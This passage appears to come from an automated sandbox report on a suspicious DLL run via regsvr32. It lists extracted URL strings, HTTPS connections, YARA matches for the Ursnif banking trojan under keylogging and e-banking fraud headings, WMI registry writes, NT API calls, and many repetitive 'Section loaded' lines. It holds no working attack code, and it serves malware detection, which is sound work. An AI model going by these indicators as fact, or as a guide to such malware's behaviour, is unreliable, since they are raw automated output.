            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.skype.com/
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://www.skype.com/de
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://www.skype.com/de/download-skype
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.skyscanner.net/flights?associateid=API_B2B_19305_00001&amp;vertical=custom&amp;pageType=
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002
            Source: iab2Data[1].json.4.drString found in binary or memory: https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin
            Source: iab2Data[1].json.4.drString found in binary or memory: https://www.vidstart.com/wp-content/uploads/2018/09/PrivacyPolicyPDF-Vidstart.pdf
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000001.00000003.270922495.0000000005648000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.270853129.0000000005648000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.270899623.0000000005648000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.270776978.0000000005648000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.270748296.0000000005648000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.603390107.0000000005648000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.270930873.0000000005648000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.270911726.0000000005648000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.270883574.0000000005648000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5664, type: MEMORY

            E-Banking Fraud:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000001.00000003.270922495.0000000005648000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.270853129.0000000005648000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.270899623.0000000005648000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.270776978.0000000005648000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.270748296.0000000005648000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.603390107.0000000005648000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.270930873.0000000005648000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.270911726.0000000005648000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.270883574.0000000005648000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5664, type: MEMORY

            System Summary:

            barindex
            PE file has nameless sectionsShow sources
            Source: statis1c.dllStatic PE information: section name:
            Writes or reads registry keys via WMIShow sources
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Writes registry values via WMIShow sources
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_00401A34 GetProcAddress,NtCreateSection,memset,1_2_00401A34
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_004010BA NtMapViewOfSection,1_2_004010BA
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_004023F5 NtQueryVirtualMemory,1_2_004023F5
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_011271B9 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,1_2_011271B9
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_0112B2FD NtQueryVirtualMemory,1_2_0112B2FD
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_00DF009C NtAllocateVirtualMemory,1_2_00DF009C
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_00DF0066 NtAllocateVirtualMemory,1_2_00DF0066
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_004021D41_2_004021D4
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_011259201_2_01125920
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_0112B0DC1_2_0112B0DC
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_00DF08E61_2_00DF08E6
            Source: statis1c.dllStatic PE information: Number of sections : 16 > 10
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: @ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ? .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: > .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: = .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: < .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ; .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: : .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 9 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 8 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 7 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 6 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 5 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 4 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 3 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 2 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 1 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 0 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: - .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: , .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: + .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: * .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ) .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ( .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ' .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: & .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: % .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: $ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: # .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ' .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ! .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ~ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: } .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: | .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: { .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: z .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: y .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: x .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: w .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: v .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: u .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: t .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: s .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: r .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: q .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: p .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: o .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: n .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: m .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: l .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: k .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: j .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: i .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: h .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: g .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: f .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: e .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: d .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: c .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: b .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: a .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ` .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: _ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ^ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ] .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: [ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: z .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: y .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: x .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: w .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: v .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: u .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: t .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: s .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: r .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: q .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: p .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: o .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: n .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: m .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: l .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: k .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: j .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: i .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: h .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: g .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: f .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: e .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: d .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: c .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: b .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: a .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: @ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ? .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: > .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: = .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: < .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ; .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: : .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 9 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 8 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 7 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 6 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 5 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 4 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 3 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 2 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 1 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 0 .dllJump to behavior
